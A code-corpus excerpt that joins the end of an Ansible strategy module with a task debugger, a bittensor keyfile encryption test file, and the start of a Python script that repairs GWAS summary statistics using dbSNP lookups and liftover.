if run_once:
break
# collect the results from the handler run
host_results = self._wait_on_handler_results(iterator, handler, notified_hosts)
try:
included_files = IncludedFile.process_include_results(
host_results,
iterator=iterator,
loader=self._loader,
variable_manager=self._variable_manager
)
except AnsibleError as e:
return False
result = True
if len(included_files) > 0:
for included_file in included_files:
try:
new_blocks = self._load_included_file(included_file, iterator=iterator, is_handler=True)
# for every task in each block brought in by the include, add the list
# of hosts which included the file to the notified_handlers dict
for block in new_blocks:
iterator._play.handlers.append(block)
iterator.cache_block_tasks(block)
for task in block.block:
task_name = task.get_name()
display.debug("adding task '%s' included in handler '%s'" % (task_name, handler_name))
self._notified_handlers[task._uuid] = included_file._hosts[:]
result = self._do_handler_run(
handler=task,
handler_name=task_name,
iterator=iterator,
play_context=play_context,
notified_hosts=included_file._hosts[:],
)
if not result:
break
except AnsibleError as e:
for host in included_file._hosts:
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
display.warning(str(e))
continue
# remove hosts from notification list
self._notified_handlers[handler._uuid] = [
h for h in self._notified_handlers[handler._uuid]
if h not in notified_hosts]
display.debug("done running handlers, result is: %s" % result)
return result
def _filter_notified_hosts(self, notified_hosts):
'''
Filter notified hosts according to the strategy
'''
# As main strategy is linear, we do not filter hosts
# We return a copy to avoid race conditions
return notified_hosts[:]
def _take_step(self, task, host=None):
ret = False
msg = u'Perform task: %s ' % task
if host:
msg += u'on %s ' % host
msg += u'(N)o/(y)es/(c)ontinue: '
resp = display.prompt(msg)
if resp.lower() in ['y', 'yes']:
display.debug("User ran task")
ret = True
elif resp.lower() in ['c', 'continue']:
display.debug("User ran task and canceled step mode")
self._step = False
ret = True
else:
display.debug("User skipped task")
display.banner(msg)
return ret
def _cond_not_supported_warn(self, task_name):
display.warning("%s task does not support when conditional" % task_name)
def _execute_meta(self, task, play_context, iterator, target_host):
# meta tasks store their args in the _raw_params field of args,
# since they do not use k=v pairs, so get that
meta_action = task.args.get('_raw_params')
def _evaluate_conditional(h):
all_vars = self._variable_manager.get_vars(play=iterator._play, host=h, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
return task.evaluate_conditional(templar, all_vars)
skipped = False
msg = ''
if meta_action == 'noop':
# FIXME: issue a callback for the noop here?
if task.when:
self._cond_not_supported_warn(meta_action)
msg = "noop"
elif meta_action == 'flush_handlers':
if task.when:
self._cond_not_supported_warn(meta_action)
self._flushed_hosts[target_host] = True
self.run_handlers(iterator, play_context)
self._flushed_hosts[target_host] = False
msg = "ran handlers"
elif meta_action == 'refresh_inventory' or self.flush_cache:
if task.when:
self._cond_not_supported_warn(meta_action)
self._inventory.refresh_inventory()
msg = "inventory successfully refreshed"
elif meta_action == 'clear_facts':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
hostname = host.get_name()
self._variable_manager.clear_facts(hostname)
msg = "facts cleared"
else:
skipped = True
elif meta_action == 'clear_host_errors':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
self._tqm._failed_hosts.pop(host.name, False)
self._tqm._unreachable_hosts.pop(host.name, False)
iterator._host_states[host.name].fail_state = iterator.FAILED_NONE
msg = "cleared host errors"
else:
skipped = True
elif meta_action == 'end_play':
if _evaluate_conditional(target_host):
for host in self._inventory.get_hosts(iterator._play.hosts):
if host.name not in self._tqm._unreachable_hosts:
iterator._host_states[host.name].run_state = iterator.ITERATING_COMPLETE
msg = "ending play"
elif meta_action == 'reset_connection':
all_vars = self._variable_manager.get_vars(play=iterator._play, host=target_host, task=task)
templar = Templar(loader=self._loader, variables=all_vars)
# apply the given task's information to the connection info,
# which may override some fields already set by the play or
# the options specified on the command line
play_context = play_context.set_task_and_variable_override(task=task, variables=all_vars, templar=templar)
# fields set from the play/task may be based on variables, so we have to
# do the same kind of post validation step on it here before we use it.
play_context.post_validate(templar=templar)
# now that the play context is finalized, if the remote_addr is not set
# default to using the host's address field as the remote address
if not play_context.remote_addr:
play_context.remote_addr = target_host.address
# We also add "magic" variables back into the variables dict to make sure
# a certain subset of variables exist.
play_context.update_vars(all_vars)
if task.when:
self._cond_not_supported_warn(meta_action)
if target_host in self._active_connections:
connection = Connection(self._active_connections[target_host])
del self._active_connections[target_host]
else:
connection = connection_loader.get(play_context.connection, play_context, os.devnull)
play_context.set_options_from_plugin(connection)
if connection:
try:
connection.reset()
msg = 'reset connection'
except ConnectionError as e:
# most likely socket is already closed
display.debug("got an error while closing persistent connection: %s" % e)
else:
msg = 'no connection, nothing to reset'
else:
raise AnsibleError("invalid meta action requested: %s" % meta_action, obj=task._ds)
result = {'msg': msg}
if skipped:
result['skipped'] = True
else:
result['changed'] = False
display.vv("META: %s" % msg)
return [TaskResult(target_host, task, result)]
def get_hosts_left(self, iterator):
''' returns list of available hosts for this iterator by filtering out unreachables '''
hosts_left = []
for host in self._inventory.get_hosts(iterator._play.hosts, order=iterator._play.order):
if host.name not in self._tqm._unreachable_hosts:
hosts_left.append(host)
return hosts_left
def update_active_connections(self, results):
''' updates the current active persistent connections '''
for r in results:
if 'args' in r._task_fields:
socket_path = r._task_fields['args'].get('_ansible_socket')
if socket_path:
if r._host not in self._active_connections:
self._active_connections[r._host] = socket_path
class NextAction(object):
""" The next action after an interpreter's exit. """
REDO = 1
CONTINUE = 2
EXIT = 3
def __init__(self, result=EXIT):
self.result = result
class Debugger(cmd.Cmd):
prompt_continuous = '> ' # multiple lines
def __init__(self, task, host, task_vars, play_context, result, next_action):
# cmd.Cmd is old-style class
cmd.Cmd.__init__(self)
self.prompt = '[%s] %s (debug)> ' % (host, task)
self.intro = None
self.scope = {}
self.scope['task'] = task
self.scope['task_vars'] = task_vars
self.scope['host'] = host
self.scope['play_context'] = play_context
self.scope['result'] = result
self.next_action = next_action
def cmdloop(self):
try:
cmd.Cmd.cmdloop(self)
except KeyboardInterrupt:
pass
do_h = cmd.Cmd.do_help
def do_EOF(self, args):
"""Quit"""
return self.do_quit(args)
def do_quit(self, args):
"""Quit"""
display.display('User interrupted execution')
self.next_action.result = NextAction.EXIT
return True
do_q = do_quit
def do_continue(self, args):
"""Continue to next result"""
self.next_action.result = NextAction.CONTINUE
return True
do_c = do_continue
def do_redo(self, args):
"""Schedule task for re-execution. The re-execution may not be the next result"""
self.next_action.result = NextAction.REDO
return True
do_r = do_redo
def evaluate(self, args):
try:
return eval(args, globals(), self.scope)
except Exception:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else:
exc_type_name = t.__name__
display.display('***%s:%s' % (exc_type_name, repr(v)))
raise
def do_pprint(self, args):
"""Pretty Print"""
try:
result = self.evaluate(args)
display.display(pprint.pformat(result))
except Exception:
pass
do_p = do_pprint
def execute(self, args):
try:
code = compile(args + '\n', '<stdin>', 'single')
exec(code, globals(), self.scope)
except Exception:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else:
exc_type_name = t.__name__
display.display('***%s:%s' % (exc_type_name, repr(v)))
raise
def default(self, line):
try:
self.execute(line)
except Exception:
pass
| 45.483037 | 156 | 0.590662 |
4a1e39eb24df3b0b9023e350d44c980fb3d1fc3e | 6,455 | py | Python | tests/integration_tests/test_keyfile.py | AltaverseDAO/bittensor | ce0e6887d7e2b279b168949d4e7730981db8de6f | ["MIT"] | null | null | null | tests/integration_tests/test_keyfile.py | AltaverseDAO/bittensor | ce0e6887d7e2b279b168949d4e7730981db8de6f | ["MIT"] | null | null | null | tests/integration_tests/test_keyfile.py | AltaverseDAO/bittensor | ce0e6887d7e2b279b168949d4e7730981db8de6f | ["MIT"] | null | null | null |
# The MIT License (MIT)
# Copyright © 2021 Yuma Rao
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the “Software”), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of
# the Software.
# THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import bittensor
from unittest.mock import MagicMock
import os
import shutil
import unittest.mock as mock
import pytest
# Init dirs.
if os.path.exists('/tmp/pytest'):
shutil.rmtree('/tmp/pytest')
def test_create():
keyfile = bittensor.keyfile (path = '/tmp/pytest/keyfile' )
mnemonic = bittensor.Keypair.generate_mnemonic( 12 )
alice = bittensor.Keypair.create_from_mnemonic(mnemonic)
keyfile.set_keypair(alice, encrypt=True, overwrite=True, password = 'thisisafakepassword')
assert keyfile.is_readable()
assert keyfile.is_writable()
assert keyfile.is_encrypted()
keyfile.decrypt( password = 'thisisafakepassword' )
assert not keyfile.is_encrypted()
keyfile.encrypt( password = 'thisisafakepassword' )
assert keyfile.is_encrypted()
str(keyfile)
keyfile.decrypt( password = 'thisisafakepassword' )
assert not keyfile.is_encrypted()
str(keyfile)
assert keyfile.get_keypair( password = 'thisisafakepassword' ).ss58_address == alice.ss58_address
assert keyfile.get_keypair( password = 'thisisafakepassword' ).private_key == alice.private_key
assert keyfile.get_keypair( password = 'thisisafakepassword' ).public_key == alice.public_key
bob = bittensor.Keypair.create_from_uri ('/Bob')
keyfile.set_keypair(bob, encrypt=True, overwrite=True, password = 'thisisafakepassword')
assert keyfile.get_keypair( password = 'thisisafakepassword' ).ss58_address == bob.ss58_address
assert keyfile.get_keypair( password = 'thisisafakepassword' ).public_key == bob.public_key
repr(keyfile)
def test_legacy_coldkey():
keyfile = bittensor.keyfile (path = '/tmp/pytest/coldlegacy_keyfile' )
keyfile.make_dirs()
keyfile_data = b'0x32939b6abc4d81f02dff04d2b8d1d01cc8e71c5e4c7492e4fa6a238cdca3512f'
with open('/tmp/pytest/coldlegacy_keyfile', "wb") as keyfile_obj:
keyfile_obj.write( keyfile_data )
assert keyfile.keyfile_data == keyfile_data
keyfile.encrypt( password = 'this is the fake password' )
keyfile.decrypt( password = 'this is the fake password' )
keypair_bytes = b'{"accountId": "0x32939b6abc4d81f02dff04d2b8d1d01cc8e71c5e4c7492e4fa6a238cdca3512f", "publicKey": "0x32939b6abc4d81f02dff04d2b8d1d01cc8e71c5e4c7492e4fa6a238cdca3512f", "secretPhrase": null, "secretSeed": null, "ss58Address": "5DD26kC2kxajmwfbbZmVmxhrY9VeeyR1Gpzy9i8wxLUg6zxm"}'
assert keyfile.keyfile_data == keypair_bytes
assert keyfile.get_keypair().ss58_address == "5DD26kC2kxajmwfbbZmVmxhrY9VeeyR1Gpzy9i8wxLUg6zxm"
assert keyfile.get_keypair().public_key == "0x32939b6abc4d81f02dff04d2b8d1d01cc8e71c5e4c7492e4fa6a238cdca3512f"
def test_validate_password():
from bittensor._keyfile.keyfile_impl import validate_password
assert validate_password(None) == False
assert validate_password('passw0rd') == False
assert validate_password('123456789') == False
with mock.patch('getpass.getpass',return_value='biTTensor'):
assert validate_password('biTTensor') == True
with mock.patch('getpass.getpass',return_value='biTTenso'):
assert validate_password('biTTensor') == False
def test_decrypt_keyfile_data_legacy():
import base64
from bittensor._keyfile.keyfile_impl import decrypt_keyfile_data
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.backends import default_backend
__SALT = b"Iguesscyborgslikemyselfhaveatendencytobeparanoidaboutourorigins"
def __generate_key(password):
kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), salt=__SALT, length=32, iterations=10000000, backend=default_backend())
key = base64.urlsafe_b64encode(kdf.derive(password.encode()))
return key
pw = 'fakepasssword238947239'
data = b'encrypt me!'
key = __generate_key(pw)
cipher_suite = Fernet(key)
encrypted_data = cipher_suite.encrypt(data)
decrypted_data = decrypt_keyfile_data( encrypted_data, pw)
assert decrypted_data == data
def test_user_interface():
from bittensor._keyfile.keyfile_impl import ask_password_to_encrypt
with mock.patch('getpass.getpass', side_effect = ['pass', 'password', 'asdury3294y', 'asdury3294y']):
assert ask_password_to_encrypt() == 'asdury3294y'
def test_overwriting():
from bittensor._keyfile.keyfile_impl import KeyFileError
keyfile = bittensor.keyfile (path = '/tmp/pytest/keyfile' )
alice = bittensor.Keypair.create_from_uri ('/Alice')
keyfile.set_keypair(alice, encrypt=True, overwrite=True, password = 'thisisafakepassword')
bob = bittensor.Keypair.create_from_uri ('/Bob')
with pytest.raises(KeyFileError) as pytest_wrapped_e:
with mock.patch('builtins.input', return_value = 'n'):
keyfile.set_keypair(bob, encrypt=True, overwrite=False, password = 'thisisafakepassword')
def test_keyfile_mock():
file = bittensor.keyfile( _mock = True )
assert file.exists_on_device()
assert not file.is_encrypted()
assert file.is_readable()
assert file.data
assert file.keypair
file.set_keypair( keypair = bittensor.Keypair.create_from_mnemonic( mnemonic = bittensor.Keypair.generate_mnemonic() ))
def test_keyfile_mock_func():
file = bittensor.keyfile.mock()
| 47.814815 | 298 | 0.757242 |
4a1e3a8041bc9d758c1e79b2e21d6938c4decc6f | 24,167 | py | Python | lib/loop_fix.py | Titorat/SSrehab | 6691ee1ed442073bfa00a51f0d9ab74b9252d302 | ["MIT"] | null | null | null | lib/loop_fix.py | Titorat/SSrehab | 6691ee1ed442073bfa00a51f0d9ab74b9252d302 | ["MIT"] | null | null | null | lib/loop_fix.py | Titorat/SSrehab | 6691ee1ed442073bfa00a51f0d9ab74b9252d302 | ["MIT"] | null | null | null |
# standard library
import io
import sys
import re
from typing import Dict, Literal
import os
import time
from math import isnan
import gzip
# third-party libraries
from liftover import ChainFile as get_lifter_from_ChainFile # type: ignore # pylance mistakenly doesn't recognize ChainFile
# local
from math_utils import normal_p_area_two_tailed, normal_z_score_two_tailed
from standard_column_order import STANDARD_COLUMN_ORDER
from validate_utils import read_report_from_dir
from env import GWASSS_BUILD_NUMBER_ENV, get_build, set_build
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# INPUT #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
if len(sys.argv) < 8: # the very first 0th arg is the name of this script
print("ERROR: you should specify args:")
print(" #1 GWAS summary statistics file in the internal \"standard\" tsv format")
print(" #2 directory with the report about the GWAS summary statistics file")
print(" #3 OUTPUT: filename for GWAS summary statistics with fixes")
print(" #4 preprocessed dbSNP1 file, or \"None\"")
print(" #5 preprocessed dbSNP2 file, or \"None\"")
print(" #6 chain file for liftover from build 36 or 37 to build 38, or \"None\"")
print(" #7 frequency database slug (e.g.: \"GnomAD\", \"dbGaP_PopFreq\", \"TOMMO\"), or \"None\"")
print(" #8 (optional) Either \"rsID\" or \"ChrBP\". Denotes the sorting of the input GWAS SS file")
exit(1)
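# Editor's sketch -- a minimal illustrative invocation matching the argument list printed above
# (file names and the optional sorting hint are hypothetical, not taken from the original script):
#   python lib/loop_fix.py GWAS_standard.tsv report_dir/ GWAS_fixed.tsv \
#       dbSNP1_preprocessed.gz dbSNP2_preprocessed.gz hg19ToHg38.over.chain.gz GnomAD ChrBP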
# GWAS_FILE has to be in the internal "standard" tsv format
GWAS_FILE = sys.argv[1]
REPORT_DIR = sys.argv[2]
OUTPUT_GWAS_FILE = sys.argv[3]
SNPs_FILE = sys.argv[4]
SNPs_rsID_FILE = sys.argv[5]
CHAIN_FILE = sys.argv[6]
FREQ_DATABASE_SLUG = sys.argv[7].lower() if sys.argv[7] != 'None' else None
GWAS_SORTING: Literal[None, 'rsID', 'ChrBP'] = None
if len(sys.argv) > 8:
GWAS_SORTING = sys.argv[8] if sys.argv[8] in ('rsID', 'ChrBP') else None # type: ignore # pylance doesn't collapse types properly atm
def file_exists(path: str):
return os.path.isfile(path)
if not file_exists(GWAS_FILE):
print(f"ERROR: provided gwas file doesn't exist: {GWAS_FILE}")
exit(1)
GWAS_FILE_o = open(GWAS_FILE, 'r')
OUTPUT_GWAS_FILE_o = open(OUTPUT_GWAS_FILE, 'w')
line_i=0
cols_i: Dict[str, int] = {STANDARD_COLUMN_ORDER[i]:i for i in range(len(STANDARD_COLUMN_ORDER))}
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# CONSTANTS #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
NUCLEOTIDES = ['a', 't', 'c', 'g']
NO_NUCLEOTIDE = '.'
ALLOW_MULTI_NUCLEOTIDE_POLYMORPHISMS = True
CATEGORY_CHR = [
'1', '01', '2', '02', '3', '03', '4', '04', '5', '05', '6', '06', '7', '07', '8', '08', '9', '09',
'10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20',
'21', '22', '23', 'X', 'x', 'Y', 'y', 'M', 'm']
class kukdefaultdict(dict):
def __missing__(self, key):
return key
CHR_ORDER = kukdefaultdict() # if unknown key was passed, returns the key itself
CHR_ORDER['1'] = 1
CHR_ORDER['01'] = 1 #
CHR_ORDER['2'] = 2
CHR_ORDER['02'] = 2 #
CHR_ORDER['3'] = 3
CHR_ORDER['03'] = 3 #
CHR_ORDER['4'] = 4
CHR_ORDER['04'] = 4 #
CHR_ORDER['5'] = 5
CHR_ORDER['05'] = 5 #
CHR_ORDER['6'] = 6
CHR_ORDER['06'] = 6 #
CHR_ORDER['7'] = 7
CHR_ORDER['07'] = 7 #
CHR_ORDER['8'] = 8
CHR_ORDER['08'] = 8 #
CHR_ORDER['9'] = 9
CHR_ORDER['09'] = 9 #
CHR_ORDER['10'] = 10
CHR_ORDER['11'] = 11
CHR_ORDER['12'] = 12
CHR_ORDER['13'] = 13
CHR_ORDER['14'] = 14
CHR_ORDER['15'] = 15
CHR_ORDER['16'] = 16
CHR_ORDER['17'] = 17
CHR_ORDER['18'] = 18
CHR_ORDER['19'] = 19
CHR_ORDER['20'] = 20
CHR_ORDER['21'] = 21
CHR_ORDER['22'] = 22
CHR_ORDER['23'] = 23
CHR_ORDER['X'] = 25
CHR_ORDER['x'] = 25
CHR_ORDER['Y'] = 26
CHR_ORDER['y'] = 26
CHR_ORDER['M'] = 27
CHR_ORDER['m'] = 27
CHR_LIFTOVER = kukdefaultdict()
CHR_LIFTOVER['1'] = '1'
CHR_LIFTOVER['01'] = '1' #
CHR_LIFTOVER['2'] = '2'
CHR_LIFTOVER['02'] = '2' #
CHR_LIFTOVER['3'] = '3'
CHR_LIFTOVER['03'] = '3' #
CHR_LIFTOVER['4'] = '4'
CHR_LIFTOVER['04'] = '4' #
CHR_LIFTOVER['5'] = '5'
CHR_LIFTOVER['05'] = '5' #
CHR_LIFTOVER['6'] = '6'
CHR_LIFTOVER['06'] = '6' #
CHR_LIFTOVER['7'] = '7'
CHR_LIFTOVER['07'] = '7' #
CHR_LIFTOVER['8'] = '8'
CHR_LIFTOVER['08'] = '8' #
CHR_LIFTOVER['9'] = '9'
CHR_LIFTOVER['09'] = '9' #
CHR_LIFTOVER['10'] = '10'
CHR_LIFTOVER['11'] = '11'
CHR_LIFTOVER['12'] = '12'
CHR_LIFTOVER['13'] = '13'
CHR_LIFTOVER['14'] = '14'
CHR_LIFTOVER['15'] = '15'
CHR_LIFTOVER['16'] = '16'
CHR_LIFTOVER['17'] = '17'
CHR_LIFTOVER['18'] = '18'
CHR_LIFTOVER['19'] = '19'
CHR_LIFTOVER['20'] = '20'
CHR_LIFTOVER['21'] = '21'
CHR_LIFTOVER['22'] = '22'
CHR_LIFTOVER['23'] = '23'
CHR_LIFTOVER['X'] = 'X'
CHR_LIFTOVER['x'] = 'X'
CHR_LIFTOVER['Y'] = 'Y'
CHR_LIFTOVER['y'] = 'Y'
CHR_LIFTOVER['M'] = 'M'
CHR_LIFTOVER['m'] = 'M'
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# FUNCTIONS #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
def copy_line(line_i):
OUTPUT_GWAS_FILE_o.write(GWAS_FILE_o.readline())
return line_i + 1
# # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# FUNCTIONS THAT RUN MANY TIMES #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # #
##### read/write #####
def get_next_line_in_GWASSS():
line = GWAS_FILE_o.readline()
if line == '': raise EOFError('attempt to read beyond the end of GWAS SS file')
return line.split("\t")
def write_line_to_GWASSS(fields):
OUTPUT_GWAS_FILE_o.write("\t".join(fields))
def read_dbSNP1_data_row(FILE_o: io.TextIOWrapper):
"""Reads a row from the preprocessed dbSNP file 1"""
line = FILE_o.readline()
words = line.split()
return (
words[0], # Chr
int(words[1]), # BP
words[2], # rsID
words[3], # REF
words[4], # ALT
words[5], # freq
)
def read_dbSNP2_data_row(FILE_o: io.TextIOWrapper):
"""Reads a row from the preprocessed dbSNP file 2 (which is sorted by rsID)"""
line = FILE_o.readline()
words = line.split()
return (
words[1], # Chr
words[2], # BP
words[0], # rsID
words[3], # REF
words[4], # ALT
words[5], # freq
)
def gt(val1, val2):
"""
A safe "greater than" operator. Accepts int and str for both args.
It has the following 3 important features:
- if both values are numbers (like chromosome order number), it compares numerically
- if both values are strings (like unrecognized chromosome numbers), compares alphabetically
- if the second value is string (like unrecognized chromosome number), and
the first value is number (like chromosome order number),
then it assumes the number is always no bigger than the string.
This is because (here) "unrecognized" chromosome numbers in dbSNP always go after
the common chromosome numbers (known in the CHR_ORDER dictionary).
With the assumption that the case where the first value is string
and the second value is number doesn't occur,
this order relation defines a *totally ordered set* which is mathematically defined as:
1. First go chromosome numbers defined as keys in CHR_ORDER dictionary,
starting with '1' = '01', ordered by the corresponding values in the dictionary.
2. After that goes the set of all other strings
(the complement set of strings to the set of known chromosome numbers)
in the ascending alphabetical order
This matches the way GWAS SS is sorted by Chr and BP here.
"""
try:
return val1 > val2
except:
return False
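# Editor's sketch of the resulting order relation (illustrative values, not executed here;
# the contig names below are hypothetical examples of "unrecognized" chromosome strings):
#   gt(CHR_ORDER['7'], CHR_ORDER['10'])  -> False  (7 < 10: numeric, not alphabetical, comparison)
#   gt(CHR_ORDER['X'], CHR_ORDER['22'])  -> True   (25 > 22)
#   gt(CHR_ORDER['22'], 'GL000195.1')    -> False  (int vs str raises, so known chromosomes never
#                                                   sort after unrecognized contig names)
#   gt('NW_003315905.1', 'GL000195.1')   -> True   (two unrecognized names compare alphabetically)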
##### Math & Stats functions #####
"""
These functions resolve each of the three values (p-value, beta, standard error) from the other two
s = b/z,
where:
s - standard error,
b - beta-value,
z - the normal z-score that corresponds to the p-value
e.g. for the two-tailed test (which is used in GWAS):
z = qnorm(1 - p/2),
where:
qnorm - inverse cumulative function for normal distribution
"""
def get_StdErr_from_beta_pval(beta, p):
z = normal_z_score_two_tailed(p)
return abs(beta)/z if z != 0 else 'nan'
def get_beta_from_StdErr_pval(se, p):
z = normal_z_score_two_tailed(p)
return se*z
def get_pval_from_beta_StdErr(beta, se):
z = abs(beta)/se if se != 0 else 'nan'
return normal_p_area_two_tailed(z)
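# Editor's note -- a quick numeric sanity check of the relations above (values approximate,
# two-tailed case): p = 0.05 gives z = qnorm(1 - 0.05/2) ~ 1.96, so
#   get_StdErr_from_beta_pval(0.10, 0.05)   ~ 0.051   # s = b/z
#   get_beta_from_StdErr_pval(0.051, 0.05)  ~ 0.10    # b = s*z
#   get_pval_from_beta_StdErr(0.10, 0.051)  ~ 0.05    # p recovered from z = b/s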
##### Field validators #####
"""
These boolean functions:
accept the list of fields read from a line;
return a boolean value answering whether or not a particular field in a row is valid or not
"""
def is_valid_rsID(fields):
try:
rsid = fields[cols_i["rsID"]]
if not re.match(r"^rs\d+$", rsid):
return False
except:
return False
return True
def is_valid_Chr(fields):
try:
chr = fields[cols_i["Chr"]]
if chr not in CATEGORY_CHR:
return False
except:
return False
return True
def is_valid_BP(fields):
try:
bp = int(float(fields[cols_i["BP"]])) # using float allows sci notation string
if bp < 0:
return False
except:
return False
return True
def is_valid_EA_allowMNP(fields):
try:
ea = fields[cols_i["EA"]]
if ea == '':
return False
if ea == NO_NUCLEOTIDE:
return True
for char in ea.lower():
if char not in NUCLEOTIDES:
return False
except:
return False
return True
def is_valid_OA_allowMNP(fields):
try:
oa = fields[cols_i["OA"]]
if oa == '':
return False
if oa == NO_NUCLEOTIDE:
return True
for char in oa.lower():
if char not in NUCLEOTIDES:
return False
except:
return False
return True
def is_valid_EA_dontallowMNP(fields):
try:
ea = fields[cols_i["EA"]]
if ea == '':
return False
if ea == NO_NUCLEOTIDE:
return True
if ea.lower() not in NUCLEOTIDES:
return False
except:
return False
return True
def is_valid_OA_dontallowMNP(fields):
try:
oa = fields[cols_i["OA"]]
if oa == '':
return False
if oa == NO_NUCLEOTIDE:
return True
if oa.lower() not in NUCLEOTIDES:
return False
except:
return False
return True
is_valid_EA = None
is_valid_OA = None
if ALLOW_MULTI_NUCLEOTIDE_POLYMORPHISMS:
is_valid_EA = is_valid_EA_allowMNP
is_valid_OA = is_valid_OA_allowMNP
else:
is_valid_EA = is_valid_EA_dontallowMNP
is_valid_OA = is_valid_OA_dontallowMNP
def is_valid_EAF(fields):
try:
af = float(fields[cols_i["EAF"]])
if not (0 <= af <= 1):
return False
except:
return False
return True
def is_valid_SE(fields):
try:
se = float(fields[cols_i["SE"]])
if isnan(se):
return False
except:
return False
return True
def is_valid_beta(fields):
try:
beta = float(fields[cols_i["beta"]])
if isnan(beta):
return False
except:
return False
return True
def is_valid_pval(fields):
try:
pval = float(fields[cols_i["pval"]])
if isnan(pval) or not (0 <= pval <= 1):
return False
except:
return False
return True
##### RESOLVERS helpers #####
"""
These void functions accept the list of fields read from a line and may mutate it
`fields`: list[str]
list of entries in a row
"""
def resolve_allele(fields, REF, ALT):
"""
Runs iff exactly one allele entry is missing.
Depending on the REF and ALT (from the dbSNP), decides which one is the allele that's present,
and restores the other one in accord.
"""
if is_valid_EA(fields) and not is_valid_OA(fields):
MA = 'OA' # missing allele
PA = 'EA' # present allele
elif is_valid_OA(fields) and not is_valid_EA(fields):
MA = 'EA' # missing allele
PA = 'OA' # present allele
else:
return
PA_val = fields[cols_i[PA]]
if PA_val == REF:
fields[cols_i[MA]] = ALT.split(',')[0]
return
for a in ALT.split(','):
if PA_val == a:
fields[cols_i[MA]] = REF
return
def resolve_EAF(fields, REF, ALT, SNP_freq_field):
"""
1. Tries to find the allele by exact match in REF or ALT;
2. Checks if frequency entry from the given database slug is present;
3. Takes the allele frequency for the corresponding allele
"""
"""
example value for `SNP_freq_field`:
"freq=1000Genomes:0.9988,.,0.001198|GnomAD:0.9943,0.005747,."
This describes allele frequencies for 3 alleles,
from 2 databases: 1000Genomes, GnomAD
Having 3 alleles, means an allele in REF field and two alleles in ALT separated with comma.
For this example, REF and ALT values are the following:
"TA"
"T,TAA"
and `FREQ_DATABASE_SLUG`:
"GnomAD"
"""
if not is_valid_EAF(fields) and is_valid_EA(fields):
try:
freqs = SNP_freq_field.replace('freq=','').replace('|',':').split(':') # ["1000Genomes", "0.9988,.,0.001198", "GnomAD", "0.9943,0.005747,."]
freqs = [f.lower() for f in freqs] # ["1000genomes", "0.9988,.,0.001198", "gnomad", "0.9943,0.005747,."]
alleles = (REF+','+ALT).split(',') # ["TA", "T", "TAA"]
EA = fields[cols_i['EA']] # "T"
the_freq_db_i = freqs.index(FREQ_DATABASE_SLUG) # "2"
SNP_freqs = freqs[the_freq_db_i+1].split(',') # ["0.9943", "0.005747", "."]
allele_i = alleles.index(EA) # 1
fields[cols_i['EAF']] = SNP_freqs[allele_i] # "0.005747"
except:
fields[cols_i['EAF']] = '.'
##### RESOLVERS #####
"""
These void functions accept the list of fields read from a line and may mutate it
`fields`: list[str]
list of entries in a row
"""
def resolve_build38(fields, converter):
"""
Will use the input converter dictionary to liftover
from the build specified by the user to build38 (with 'chr' prefix)
"""
if is_valid_Chr(fields) and is_valid_BP(fields):
chr_gwas = CHR_LIFTOVER[fields[cols_i['Chr']]]
bp_gwas = int(float(fields[cols_i['BP']])) # using float allows sci notation string
try:
new_chr, new_bp, _ = converter[chr_gwas][bp_gwas][0]
fields[cols_i["Chr"]] = new_chr.replace('chr', '')
fields[cols_i["BP"]] = str(new_bp)
# if it can't liftover
except:
fields[cols_i["Chr"]] = '.'
fields[cols_i["BP"]] = '.'
def resolve_rsID(fields, SNPs_FILE_o):
"""
Loops through the SNPs file entries until it finds the current SNP in GWAS SS file
Current SNP is defined by Chr and BP from the passed `fields`, which is one row of GWAS SS
Therefore, rsID is restored by Chr and BP, which won't always work for biallelic sites
Assumes given GWAS SS file is sorted by Chr and BP, in the same way SNPs file is.
`SNPs_FILE_o`
opened SNPs file object
"""
if is_valid_Chr(fields) and is_valid_BP(fields) and not all([
is_valid_rsID(fields),
is_valid_OA(fields), is_valid_EA(fields),
is_valid_EAF(fields),
]):
try:
chr_gwas = fields[cols_i['Chr']]
bp_gwas = int(float(fields[cols_i['BP']]))
while True:
chr_snps, bp_snps, rsid, ref, alt, freq = read_dbSNP1_data_row(SNPs_FILE_o)
# SNPs_FILE_line_i += 1
if CHR_ORDER[chr_gwas] == CHR_ORDER[chr_snps]:
if bp_snps < bp_gwas:
continue
elif bp_gwas == bp_snps:
fields[cols_i['rsID']] = rsid
resolve_allele(fields, ref, alt)
resolve_EAF(fields, ref, alt, freq)
break # after this a new line of GWAS SS should be read and index incremented
else: #bp_snps > bp_gwas:
if not is_valid_rsID(fields):
fields[cols_i['rsID']] = '.'
break # after this a new line of GWAS SS should be read and index incremented
